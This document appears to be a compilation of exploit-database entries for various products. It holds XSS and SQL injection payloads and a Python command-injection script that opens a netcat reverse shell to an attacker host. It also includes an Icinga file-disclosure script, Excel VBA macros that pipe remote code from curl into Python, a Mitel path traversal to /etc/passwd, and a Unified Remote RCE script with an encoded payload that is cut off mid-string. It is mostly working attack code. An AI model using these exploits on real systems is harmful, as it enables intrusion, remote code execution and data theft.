<pre><code># Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS)<br /># Date: 25/02/2023<br /># Exploit Author: Sanjay Singh<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html<br /># Tested on: Windows<br /><br />use payload="><script>alert(XSS)</script><br /><br />1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php<br /><br />2. login Doctor account with default credential<br /><br />3. Click left side add description<br /><br />4. capture request and put payload <br /><br />http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E<br /><br /><br /><br />request<br /><br />GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1<br />Host: localhost<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql<br />Connection: close<br /><br /></code></pre>
<pre><code>Exploit Title: ENTAB ERP 1.0 - Username PII leak<br />Date: 17.05.2022<br />Exploit Author: Deb Prasad Banerjee<br />Vendor Homepage: https://www.entab.in<br />Version: Entab ERP 1.0<br />Tested on: Windows IIS<br />CVE: CVE-2022-30076<br /><br />Vulnerability Name: Broken Access control via Rate Limits<br /><br />Description:<br />In the entab software in fapscampuscare.in, there is a login portal with a<br />UserId field. An authenticated user would enter and get their name as well<br />as other services. However, there should be a rate limit in place, which is<br />not present. As a result, a hacker could bypass the system and obtain other<br />usernames via broken access control. This enables a threat actor to<br />obain the complete full name and user ID of the person.<br /><br />POC:<br />1. Go to fapscampuscare.in or any entab hosted software and find the entab<br />software.<br />2. Use a proxy to intercept the request.<br />3. Since it's a student login, try a random UserId (e.g., s11111).<br />4. Intercept the request using Burp Suite and send it to the Intruder.<br />5. Select payloads from number 100000-20000, and turn off URL encoding on<br />the UserId parameter.<br />6. Start the attack and sort by length to obtain the username and full name<br />of other users.<br /><br /></code></pre>
<pre><code># Exploit Title: Restaurant Management System 1.0 - SQL Injection<br /># Date: 2023-03-20<br /># Exploit Author: calfcrusher (calfcrusher@inventati.org)<br /># Vendor Homepage: https://www.sourcecodester.com/users/lewa<br /># Software Link:<br />https://www.sourcecodester.com/php/11815/restaurant-management-system.html<br /># Version: 1.0<br /># Tested on: Apache 2.4.6, PHP 5.4.16<br /><br />Endpoint: /rms/delete-order.php<br /><br />Vulnerable parameter: id (GET)<br /><br />Time Base SQL Injection payloads<br /><br />http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23<br />http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--<br /><br /></code></pre>
<pre><code># Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection <br /># Google Dork: intitle:"Altenergy Power Control Software"<br /># Date: 15/3/2023<br /># Exploit Author: Ahmed Alroky<br /># Vendor Homepage: https://apsystems.com/<br /># Version: C1.2.5<br /># Tested on: Windows 10<br /># CVE : CVE-2023-28343<br /><br /><br />import requests<br />import argparse<br /><br />def exploit(target,attacker,port):<br /> url = f'{target}/index.php/management/set_timezone'<br /><br /> headers = {<br /> 'Accept': 'application/json, text/javascript, */*; q=0.01',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',<br /> 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Origin': f'{target}',<br /> 'Referer': f'{target}/index.php/management/datetime',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'en-US,en;q=0.9',<br /> 'Connection': 'close'<br /> }<br /><br /> print(f"Sending Request")<br /> data = {<br /> 'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc<br />{attacker} {port} 1>/tmp/pipe`'<br /> }<br /><br /> response = requests.post(url, headers=headers, data=data)<br /> # print(response.text)<br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Parse target, attacker,<br />and port.',)<br /><br /> parser.add_argument('--target','-t', type=str, help='The target IP<br />address or hostname. example : http://192.168.254')<br /> parser.add_argument('--attacker','-a', type=str, help='The attacker IP<br />address or hostname.')<br /> parser.add_argument('--port', '-p',type=int, help='Listening port')<br /><br /> args = parser.parse_args()<br /> try:<br /> exploit(args.target,args.attacker,args.port)<br /> except:<br /> parser.print_help()<br /> print("Exploit done")<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure<br /># Date: 2023-03-19<br /># Exploit Author: Jacob Ebben<br /># Vendor Homepage: https://icinga.com/<br /># Software Link: https://github.com/Icinga/icingaweb2<br /># Version: <2.8.6, <2.9.6, <2.10<br /># Tested on: Icinga Web 2 Version 2.9.2 on Linux<br /># CVE: CVE-2022-24716<br /># Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/<br /><br />import argparse<br />import requests<br />from termcolor import colored<br /><br />def print_message(message, type):<br /> if type == 'SUCCESS':<br /> print('[' + colored('SUCCESS', 'green') + '] ' + message)<br /> elif type == 'INFO':<br /> print('[' + colored('INFO', 'blue') + '] ' + message)<br /> elif type == 'WARNING':<br /> print('[' + colored('WARNING', 'yellow') + '] ' + message)<br /> elif type == 'ALERT':<br /> print('[' + colored('ALERT', 'yellow') + '] ' + message)<br /> elif type == 'ERROR':<br /> print('[' + colored('ERROR', 'red') + '] ' + message)<br /><br />def get_normalized_url(url):<br /> if url[-1] != '/':<br /> url += '/'<br /> if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':<br /> url = "http://" + url<br /> return url<br /><br />def get_proxy_protocol(url):<br /> if url[0:8].lower() == 'https://':<br /> return 'https'<br /> return 'http'<br /><br />parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')<br />parser.add_argument('TARGET', type=str, <br /> help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')<br />parser.add_argument('FILE', type=str, <br /> help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')<br />parser.add_argument('-P','--proxy', type=str,<br /> help='HTTP proxy address (Example: http://127.0.0.1:8080/)')<br />args = parser.parse_args()<br /><br />if args.proxy:<br /> proxy_url = get_normalized_url(args.proxy)<br /> proxy_protocol = get_proxy_protocol(proxy_url)<br /> proxies = { proxy_protocol: proxy_url }<br />else:<br /> proxies = {}<br /><br />base_url = get_normalized_url(args.TARGET)<br />exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE<br /><br />request = requests.get(base_url, proxies=proxies)<br />if request.status_code == 404:<br /> print_message("Could not connect to provided URL!", "ERROR")<br /> exit()<br /><br />request = requests.get(exploit_url, proxies=proxies)<br />file_content = request.text<br /><br />print(file_content)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting <br /># Google Dork: NA<br /># Date: 01/04/2023<br /># Exploit Author: Yehia Elghaly - Mrvar0x<br /># Vendor Homepage: https://www.universalmediaserver.com/<br /># Software Link: https://www.universalmediaserver.com/download/<br /># Version: 13.2.1<br /># Tested on: Windows 7 / 10<br /># CVE: N/A<br /><br /><br />Summary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.<br /><br />Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths <br /><br /><br />GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1<br />Host: 172.16.110.132:9001<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br /><br />[Affected Component]<br />/<br />/about<br />/accounts<br />/actions<br />/logs<br />/player<br />/settings<br />/shared<br />/v1/api/about<br />/|echo<br /></code></pre>
<pre><code>#Exploit Title: BulletProof FTP Server 2019.0.0.51 - Denial of Service<br />#Discovery by: Yehia Elghaly - Mrvar0x<br />#Discovery Date: 2023-03-31<br />#Vendor Homepage: https://barcodemagic.com/<br />#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download<br />#Tested Version: 2019.0.0.51<br />#Tested on: Windows 7 x86 <br /><br />#Steps To Crash:<br />#Run: BulletProof_FTP_Server_2019.0.0.51.py<br />#Open poc.txt and copy content to clipboard<br />#Open BulletProof FTP Server - Select "Settings" > "SMTP"<br />#"Email Server" select "Username" and Paste Clipboard<br />#Click on "Test" -----> Crashed<br /><br />buffer = "A" * 300<br />payload = buffer<br />try:<br /> f=open("Poc.txt","w")<br /> print "[+] Creating %s evil payload.." %len(payload)<br /> f.write(payload)<br /> f.close()<br /> print "[+] File created!"<br />except:<br /> print "File cannot be created"<br /> <br /></code></pre>
<pre><code>## Title: Microsoft Excel Spoofing Vulnerability<br />## Author: nu11secur1ty<br />## Date: 04.06.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/excel<br />## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/<br />## CVE-2023-23398<br /><br />## Description:<br />The attack itself is carried out locally by a user with authentication<br />to the targeted system. An attacker could exploit the vulnerability by<br />convincing a victim, through social engineering, to download and open<br />a specially crafted file from a website which could lead to a local<br />attack on the victim's computer. The attacker can trick the victim to<br />open a malicious web page by using an Excel malicious file and he can<br />steal credentials, bank accounts information, sniffing and tracking<br />all the traffic of the victim without stopping - it depends on the<br />scenario and etc.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br /><br />```vbs<br />Sub Check_your_salaries()<br />CreateObject("Shell.Application").ShellExecute<br />"microsoft-edge:http://192.168.100.96/"<br />End Sub<br />```<br />[+]The victim Exploit + Curl Piping:<br /><br />## WARNING:<br />The exploit server must be STREAMING at the moment when the victim hit<br />the button of the exploit!<br /><br />```vbs<br />Sub silno_chukane()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)<br />End Sub<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)<br /><br />## Reference:<br />[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)<br /><br />[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)<br /><br />## Proof and Exploit<br />[href](https://streamable.com/n5qp4q)<br /><br />## Proof and Exploit<br />[href](https://streamable.com/u2wxzz)<br /><br />## Time spend:<br />01:37:00<br /><br /></code></pre>
<pre><code># Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI<br /># Date: 2022-10-14<br /># Fix Date: 2020-05<br /># Exploit Author: Kahvi-0<br /># Github: https://github.com/Kahvi-0<br /># Vendor Homepage: https://www.mitel.com/<br /># Vendor Security Advisory: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005<br /># Version: before 8.1.2.4 and 9.x before 9.1.3<br /># CVE: CVE-2020-11798<br /># CVE Reported By: Tri Bui<br /><br /><br /><br />Description:<br /><br />A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories<br /><br />Payload:<br /><br />https://[site]/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd<br /><br /></code></pre>
<pre><code># Exploit Title: Unified Remote 3.13.0 - Remote Code Execution (RCE)<br /># Google Dork: NA<br /># Date: 03/03/2023<br /># Exploit Author: H4rk3nz0<br /># Vendor Homepage: https://www.unifiedremote.com/<br /># Software Link: https://www.unifiedremote.com/download/windows<br /># Version: 3.13.0 (Current)<br /># Tested on: Windows<br /># CVE : NA<br /><br /># Due to the use of Access-Control-Allow-Origin: * on the 'Remote' upload endpoint used by Unified Remote Desktop<br /># Any internet originating webpage can make requests in the user's browser to the localhost endpoint to upload a crafted<br /># Remote zip file blob. This contains a remote.lua file which will be loaded and executed in the context of the current user<br /># The below script will automatically update the executing command and host the payload delivery webpage<br /># which can be sent to target users or included in site pages as part of social engineering<br /><br />import os, sys, zipfile, tempfile, base64, http.server, threading, argparse, tempfile, time, random, string<br />from contextlib import redirect_stdout<br />from http.server import HTTPServer, BaseHTTPRequestHandler<br /><br />parser = argparse.ArgumentParser(description='Unified Remote - Web Triggerable RCE')<br />parser.add_argument('-p','--port', help='HTTP Server Port, Default (80)', default=80, required=False)<br />parser.add_argument('-i','--ip', help='HTTP Server IP Address', required=True)<br />args = vars(parser.parse_args())<br /><br />html_404 = "PGRpdiBpZD0ibWFpbiI+CiAgICAJPGRpdiBjbGFzcz0iZm9mIj4KICAgICAgICAJCTxoMT5FcnJvciA0MDQ8L2gxPg"<br />html_404 += "ogICAgCTwvZGl2Pgo8L2Rpdj4K"<br /><br />htmlpage = "PGh0bWw+Cjxib2R5Pgo8cD5NeSBEZW1vIEFwYWNoZSBTaXRlIC0gV29yayBJbiBQcm9ncmVzcywgU3RheSBUdW5lZC"<br />htmlpage += "E8L3A+CjxzY3JpcHQ+CiAgbGV0IGJhc2U2NHppcCA9ICJwbGFjZWhvbGRlcmI2NHZhbCI7CiAgbGV0IGJpbmFyeSA9"<br />htmlpage += "IGF0b2IoYmFzZTY0emlwKTsKICBsZXQgYXJyYXkgPSBbXTsKICBmb3IgKGxldCBpID0gMDsgaSA8IGJpbmFyeS5sZW"<br />htmlpage += "5ndGg7IGkrKykgewogICAgYXJyYXkucHVzaChiaW5hcnkuY2hhckNvZGVBdChpKSk7CiAgfQoKICBsZXQgYmxvYiA9"<br />htmlpage += "IG5ldyBCbG9iKFtuZXcgVWludDhBcnJheShhcnJheSldLCB7IHR5cGU6ICJhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW"<br />htmlpage += "0iIH0pOwogIGxldCB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKICB4aHIub3BlbigiUE9TVCIsImh0dHA6Ly9s"<br />htmlpage += "b2NhbGhvc3Q6OTUxMC9zeXN0ZW0vcmVtb3RlL2FkZD9maWxlbmFtZT16aXBmaWxlbmFtZXRvYmVjaGFuZ2VkLnppcC"<br />htmlpage += "IsZmFsc2UpOwogIHhoci5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAnYXBwbGljYXRpb24veC13d3ct"<br />htmlpage += "Zm9ybS11cmxlbmNvZGVkJyk7CiAgeGhyLnNlbmQoYmxvYik7Cjwvc2NyaXB0Pgo8L2JvZHk+CjwvaHRtbD4="<br /><br />command = ""<br /><br />def generate_payload():<br /> remotename = ''.join(random.choice(string.ascii_lowercase) for i in range(8))<br /> htmlcontent = base64.b64decode(htmlpage).decode("utf-8")<br /> return htmlcontent.replace("placeholderb64val", update_payload()).replace("zipfilenametobechanged", remotename)<br /><br /><br />def update_payload():<br /> # Sample Remote Files Stored As Base64 Encoded Zip, Part to Update Is The 'remote.lua' File<br /> payloadzip = "UEsDBAoAAAAAACSVSFbg2/a5HQAAAB0AAAAKABwAcmVtb3RlLmx1YVVUCQADEzPkY8Yy5GN1eAsAAQTpAwAABO"<br /> payloadzip += "kDAABpby5wb3BlbihbW3JwbGNlbWVseWtteXhdXSkNClBLAwQKAAAAAADcgJVQoVLDXdMEAADTBAAACAAcAGlj"<br /> payloadzip += "b24ucG5nVVQJAANgUp9eYFKfXnV4CwABBOkDAAAE6QMAAIlQTkcNChoKAAAADUlIRFIAAABAAAAAQAgGAAAAqm"<br /> payloadzip += "lx3gAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAR1SURBVHja7Fs7TBRBGJ69nAUFBGhM"<br /> payloadzip += "OBMgwQRjEC3UwoJDG7E5UDtCvGspBBotNDlIsNDmfCS0HjF2Ru4aNRYChQVaABIjCSRe4ZFYgBdJpNDC+Y6ZdV"<br /> payloadzip += "j29sUMt7frnwy77M7C/t98/2t2RiOK5eTNV6fpIU5bK204b2PNTEq0LdFWoG0Z558fX5lT+X6aIqX76SFBG46N"<br /> payloadzip += "B/xzAAUg5GnLUUBKvgSAKo1RHaEtKUFpKzBytE1QIAq+AIApnmaKH6ZkZQChHUBxjPIoU76a8pABUTo0AKjycG"<br /> payloadzip += "pPLZzZYQuUT1EQcm4fjHhQfpweZn2kPGE+Z4a+W0YZAxjlM1WwdbeCMNrr1CQ0F8rPsjheC+IYBC2AyrsCQQuo"<br /> payloadzip += "8o5BsHOCmRpWnrB3n/UUBejoj9aAw3MEglV00CwKmEUSLBkwyxO0Cna/6LM4LytZajf6AzMTGA2g8jxZylgygB"<br /> payloadzip += "U2iwqrOT9IrzjHYGRAOuDKE2PxphlG/ysJh+gsEBmQJOGRG2YmMBIiAJIs2u0CwObwGkm4JCkyIEHCJwndCVIG"<br /> payloadzip += "/JDBgFhzHWmhzYls7/whq8WfpL7uCOmM1evXV4vb9N7vPX2d9PEoTVGW9kqhf+L8MTJ8ucNR34/rWyT1ZKF8fm"<br /> payloadzip += "/wlA7cs/kCuf/yy56+w30dZKhnNzfb2Noh1x68l1YnRKpd7WEk7zz/pP8ORc92NOu/45wrD0FfSaMPiUfpj24V"<br /> payloadzip += "iuU/FElu4ZulCYhswMhzRcEIPso454I+6CtReqKqGFCkVHXzslOv18mlrqNlU0AD7SHcNEB99JFdH0T8Ev7MTE"<br /> payloadzip += "Eh9XUfoIwBsN3hvuOVTYSaB1hidIzvVr6Ti5QJouCaZOrrElU1ogBAdGb7osDa5j4Adkd6hbxNN5dD3z9mrChj"<br /> payloadzip += "XoT4TJBLcOV5DhBzmFv4igFTb9ap01pz/dzkYJfptevyYr9/GQCf0Rlr0KnPnR6uWfmTQAAAmg/1tO4Ji2LYwz"<br /> payloadzip += "0VpgAAlvwAwCRNeLjt88RITHxwb1JIimT6gJIKhfrPxSyjAITXAmL6C9rfFfIBnL+4daEMAE+LAYwkWYoyBsRl"<br /> payloadzip += "A9DisDKMCVkfp74YHossA7x99YReGCEvMAuhHqQEAJZlKb2x+ct1woIKEuUtT3fNRhfXOo816IDiGS8RxkTmtY"<br /> payloadzip += "B+BXIqA1InRGpQmngYzIVQ+Tl8JuMA5EMIQF5PhNhX01LIAMgaM8FsmJTnX4lFAB6FCIDpfbUAW3IaBhbMWX0d"<br /> payloadzip += "nggBABMVq0HGgiCDkDPuPzArh7H4uBBA5cvriW3nA5h3TAUQgJTZekHTCRFGkyCZQrbSSvKKM0L0gfGApMgo98"<br /> payloadzip += "cq3bSbEksRn8wYeRT4Mu9LZdmDvTUKAt59wG6xtO2kaI2CwEfe9p3dbpiYIQqmzxTYvNwNEwYg4BzTPlUeqfyY"<br /> payloadzip += "mw1U/zdNeflvLE84w7JGP4x6uxflPTPAwIY2Up2Nk+Vk7aB7i2VvnQUQqtccYsSnZW2qlr55mkULcfO0lCqO+H"<br /> payloadzip += "3ztI3DROtmzIg7oDaUXDZOXqiQvwIMAK08yAN3QNxrAAAAAElFTkSuQmCCUEsDBBQAAAAIANyAlVBoc+9FTiAA"<br /> payloadzip += "ABkiAAAOABwAaWNvbl9oaXJlcy5wbmdVVAkAA2BSn15gUp9edXgLAAEE6QMAAATpAwAAVXl5PNRd9P/5zAwzlm"<br /> payloadzip += "amIiKZnhYU0fKkFDOU1KPQYicTQiVJlkrMpySVRBtpM1SIRNmJmQj1oKgsWbK02A2yjDHL78Pz+35fr69/Pvfc"<br /> payloadzip += "c+69Z3nfc88xV60szObJqsgCwLzdu3bsB8BhQ0RMksY+/aQ8MvZZ7G9q53/gpId/0GG/I2DsftL1CG33icOeR/"<br /> payloadzip += "YfOex+9tSHI9sAlhXv3mF88EzLYLv5FaemeOJIa1T2yF+7o/UvaHaub46hLcglLtC1/uB6JffU1pq1l3KYNpc1"<br /> payloadzip += "P6/GL2rGLb71zc6G65i77rvDUNSgtZNDzV8fyoZIXei8l9z3MRUrHilXRrqvm/LveG2eEfr1h9HHLVNTYUl3ev"<br /> payloadzip += "e1p/wrEn0K+mgY9Axu+QvKMibGjg5xJYbeIyvNiOKp4faBnsA3C2OSFbdDvcK48fTGzVbvOQ5GjekumXtFBjuX"<br /> payloadzip += "yQ9aiAQniRfLC+Tl3XgbSVDXhKPHFybEr+4/bqhyrf151kgoSfp2BIq55KlTb4R1ovpB01DqdI1hpUXZGYMld9"<br /> payloadzip += "4y3e0YgN7zGB9o+LFnYpve+qjFtl2dov6zZlVAAK/s5gQdQVNedIP7lq48K2yXr/tGIirEO99saMh2TbDRVLZ+"<br /> payloadzip += "dPHmLzwVOlNdOTaK09kN2RMC4fVkA6llCoMqCwhgNaIoFH97bvJ2aL28tyqZAO/zeyP+4qyzHu9iRnRmpG3t9F"<br /> payloadzip += "1OgF3nY+la/K5vKkbZstX4xDXUWLk8HSUaMISmLCvFGc+asaPsrVlDsngCXEnpjWgUW8odn85x81wtb7caU//G"<br /> payloadzip += "tdB7Q5TrJDWZdjTr4Mh9PRSgVlFk1aufXpbZu9BN+cyzrD3YXK6CKPd5UmaJ5WoT/c7csVdH8MtwUGPL17+m6y"<br /> payloadzip += "CMef1hwYVsacyUK0l0zYTQQ7V859dmPiYazPTzb1yvAgKTchIPa34uvy9yX4Ni83oFEtwbCnsJJHB35OunldE3"<br /> payloadzip += "qowwbDsVg6Wo8P55r2XgWEQZXe8v3xd1MqS4hUUXAUHd5STsut8RpvZLGUArLOMYWfMv/Aqn+ZpSMbqxjK6dcE"<br /> payloadzip += "jzBW/7gZ3WVOXFsgRQCKUSGMBuKOPYF4SqExACnLPml19nMTcyZldIsBU5AmNsyOgiznLH1ggPn5AcCVe/Rcb1"<br /> payloadzip += "OBtdAe6LcJZVLV8/Str9cLrvDSyAVQpiX4eOijQ+/qyMhtzl5Zczt7gqI2hft7rHTGI77/2h93SSk98aVwKEs+"<br /> payloadzip += "wUQ5vGtnMGDxoz3TUJILDmE627OvRU6o63YgqqyiKoMFISWSGWCW0RMbLy6Wx5RFcFm90mJ8k6X7Rv81vKZqde"<br /> payloadzip += "3MN8bRrEWHa5pMtyAul6kRmuLHtuAy7e8W+CvZLE176j6hpdL6J25PQTwfQFMlxVFBv/PaCuMo8p86Ts6EUDWH"<br /> payloadzip += "FA6PLCQ3SNnvVi5PTPkv4eWQPY4cBvSrfnHBdcWDV4sB1V256IZzhli6cUWGzjgSLEAO5N4IuQ2YH/QaHu/Qm8"<br /> payloadzip += "WiD+e8AzlAxDi8TGhyPo1Oh902caCzGBjY5C/TR7Tjfl3V/CbYICwfQlMvytJPa971Jw9lNyPfwVmHHeqX4eFV"<br /> payloadzip += "JT+K29xKfvpN/usMNdKZ4jKqWN1SBWU+jTif/JTPd1W4ag8ZGsXZ/05fKHpMaYu2n7Y6F7tfjBry/F1+gxNz/c"<br /> payloadzip += "4iYn1iGdI93qDmIxHvHLC5gSFP65bAxsvpCZ8CA8KpRBv/QM5bVi4B8v4fNyK/+tul8P59zzZZFJKf/3S9Hhax"<br /> payloadzip += "KPV6yrCd2U8b38wqnHIZgJIdrixhlk8tvsoqSRiK+qjTMRO/Gdp5+UzQt38JRhl3TT7Xm2QmRYKXRtqaPo4Q4i"<br /> payloadzip += "rbr7ZIl6p9cmYj+4Wwv15R6IwOPwaTbE7B1lvWqmf1FHv7X7bkj8bY/zeslv7aNkLbElkWC3YmjQGD51HUFhWF"<br /> payloadzip += "MTVuwXlnvQt9oj/T/4TIQxSqTiUsP2ohMKEqvxjgNCRGVDYUZWQrYB7FNkNfHxOeX2CA7tptAINNAUgwn8R/hu"<br /> payloadzip += "fAA9uuIH1+gMhcmXpa/XWRHZGd08Lxd4BLObMkhU8NMRd9l1PNiJmyUEB4Qn+HgqjgAV6rCMAVZC5P8QvUaEbf"<br /> payloadzip += "aX0VeJBQlh6LCuOLG3A5t9PT/0cceL0NIneF/3UcoGlsY/yE8NbfylX6gzBh42Hz9e5X5WCek00l0jhukI1K+s"<br /> payloadzip += "Z0fTP7w4SKOUJ0fjGCe920tCh9+QGZxIiWmFOjtoU/pMcS+M5/Aj9F3WkNicjx0loT7m0Gs7GpRBhxIjzdQghK"<br /> payloadzip += "0tDhvrM6xQR1cTtjVWVeODc4nsojZecjeFcYS3fsRoqcLX/L3o4dqOX6Gwx1H3XIHGC32EvSeoy0EyL+E0kF/t"<br /> payloadzip += "a7yqNDM+b8qVgqpJoCZV31baXR0G+UQmuaRwPW0ArE70k7aKiUZfoMbLabDDZPPAGrxfB973wCiRaRGWFuqu04"<br /> payloadzip += "rJCFQFS/BZ6OHhB7hsJ5xmR06U0VN9UJkaxF6YPCl04zXOXhZ8XTmIJ80glYUhbvY6yMEHYh8sTF/d/S56B/q1"<br /> payloadzip += "4qmNokfjRMajxvSQI/YfPGS4h+mwUTtdBPYECOLj2VL2Q8T3R2S4amLwcrCZQW5RoKHoegALWrIeV0/Dbl3kzs"<br /> payloadzip += "myrGbOTwq0KAwr6S2AIi1xouKfU4kTFMZMpWn3lNyuszLcCTH4H7FaEfrL/hbCNugPKu+hoOQTByc0d3/QQQp+"<br /> payloadzip += "UtArl1aiVfudZHe9wrOxldqrzOo0NJ6D1Uex7iKfUTmG06Y0wZ077rGQI0au2PmlEJK/InUCIs0m0WhlQDl7BQ"<br /> payloadzip += "5tpIPMrv40tDcOlvDxDJNbhatp4eTZ6ee7fqehqVvBes2v5E8L4epV8SGkXhpNm1APFFHO34BdNQVXhIeQdbrI"<br /> payloadzip += "GwwxMalWnCQjVdq/ZMaWGZdMDwnEvK5yNVSlNZK51UYbwJ3WMu9CvRTqN4ml79/q6DZ5N4yZthKahPiYxFPzuy"<br /> payloadzip += "5zmw1AF3Oyu4fVjoJlevfJjIDshOgQC3h/8KAqzq0f2ka+Ac1t3wnf6CQ8ZmEElkeMVMF97f2FOLc+uCfCs+Xq"<br /> payloadzip += "UsDKeVJ/JB7YxMb0oqZCizhwmiQyKFGRpLVyg0V4332jRLantCkhTiqwEUldOxNsCcCOKBuUvFpbDM6BsESAZ7"<br /> payloadzip += "hkWAdkuahBhBi4jz+Sif1p+JGLU0ugKD0iIwhqxAh7Zi1DSQ2yWdBbsDavBdGbIaKbi+DEHJN2UdDsQOQOqkN3"<br /> payloadzip += "Hy7n2xxzV7/7mjn5K+lydTZzzL/S4qL+ky9dy1CdY95r/3SbB3eyJbnHJnnJdNB7YDOs0OxP7EzqpsBp+/R+zy"<br /> payloadzip += "cqctAwKOn5bgb3HH9MZH8gcy9/o4N2o5SmxucHz6XhgQRonw1adoHmgeqs8ypneMA8HJb2eFXDnBq//s5TYk9W"<br /> payloadzip += "g5oQD7nHfjLZqwwAixT1rBK7EXOcIL+rBIe2eO9UB9k4McJoVylckTUMnZ3qkOoyNJGbB1bJt7GqrD2YALmOmf"<br /> payloadzip += "3ed+bU3vVUzsocsqYpoGJ7/JFzxmjka2x8/8CAB7cIh05iN4OXEiDabp5A6P1JBy9rHQ18Y/2cPpPejaPRX+eD"<br /> payloadzip += "txiPTn59LZ91EDaHdNloivE8KcjxsKqKh+pAeDxqBIyB2EOhLpvAS4JnzMS+5MgR0TQRr4UFXh0O1hFb++YYQb"<br /> payloadzip += "Fp5XJSaH9vx143Cjzqe4pnDqlDUe7X9dwkhDGDDfN9DRsRQP1zmxC7wKZlYPUgPA5Z9N/qbYvSqiMJoAZwxeyP"<br /> payloadzip += "GvpFyWeeXIQEGHsaFxXqc9+owRAWvk9tQaSH+nPy5y//EYfftZd09snlS//6UlWpDEnjzVgOqdzrPxfXQ6cb+s"<br /> payloadzip += "7iuPZuclB/P91iAAAlc7seiokwmr62KTMXzxZRYPTBtJ8owkN4ervbP2o+wsHn3cXRdFeair+4iaMTKql3+S0O"<br /> payloadzip += "/mQo2jHaRlE/OXFcNCUR8Lqjp8SP25Ql3WYdq0P9AutaBkIE3+jXWMV+wbzF/WlNGoFg4VKgaCF21E+OybftEG"<br /> payloadzip += "fxf+om5Aru27KEQz8rtQjNmyJZI0LVIAWWR+6hhqFfeMbhP+rjlX9OChMbmmZ+P88cDFi6f/RXBOfgm/EfvBzB"<br /> payloadzip += "fU7hn54S4td2qXsrwU4S8ZhkTszsWJovuE/fMuN1qv9mxG3lhJ7HoW/45yJdjt+bkPTXUs7rxTftCQiOBb2NsX"<br /> payloadzip += 